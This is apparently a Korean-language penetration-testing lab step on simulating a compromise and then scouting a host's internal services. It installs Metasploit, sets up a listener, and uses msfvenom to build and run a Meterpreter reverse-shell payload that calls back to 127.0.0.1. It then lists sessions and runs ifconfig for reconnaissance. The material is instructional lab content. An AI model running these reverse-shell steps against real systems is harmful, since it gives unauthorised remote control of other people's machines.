대상의 내부 네트워크 서비스 식별
이 단계에서는 대상 시스템에서 Meterpreter 세션을 획득하는 것을 시뮬레이션합니다. 실제 시나리오에서는 취약점을 악용하여 이를 달성할 것입니다. 이 랩에서는 Metasploit 에서 리스너를 설정하고 페이로드를 수동으로 실행하여 연결할 것입니다. 이를 통해 후속 공격 단계에 집중할 수 있습니다.
먼저 Metasploit Framework 를 설치해야 합니다.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
다음으로, 터미널을 열고 Metasploit 콘솔을 시작합니다.
msfconsole -q
msfconsole 내에서 수신 연결을 수신 대기할 핸들러를 설정합니다.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
이제 새 터미널을 엽니다 (터미널 탭의 "+" 버튼을 사용할 수 있습니다). 이 새 터미널에서 리스너에 다시 연결할 페이로드를 생성하고 실행합니다.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
msfconsole이 있는 첫 번째 터미널로 다시 전환합니다. 새 세션이 열렸음을 나타내는 메시지가 표시되어야 합니다. 해당 세션과 상호 작용해 봅시다.
sessions -l
sessions -i 1
이제 Meterpreter 세션에 접속했습니다. 일반적인 첫 번째 단계는 정찰 (reconnaissance) 을 수행하는 것입니다. "침해된" 호스트의 네트워크 인터페이스를 확인해 봅시다.
ifconfig
여러 네트워크 인터페이스가 표시됩니다. 이 랩에서는 추가 스캔 (이 랩의 범위를 벗어남) 을 통해 127.0.0.1의 포트 8080에서 실행 중인 웹 서비스를 발견했다고 가정합니다. 우리의 목표는 이 서비스에 접근하는 것입니다.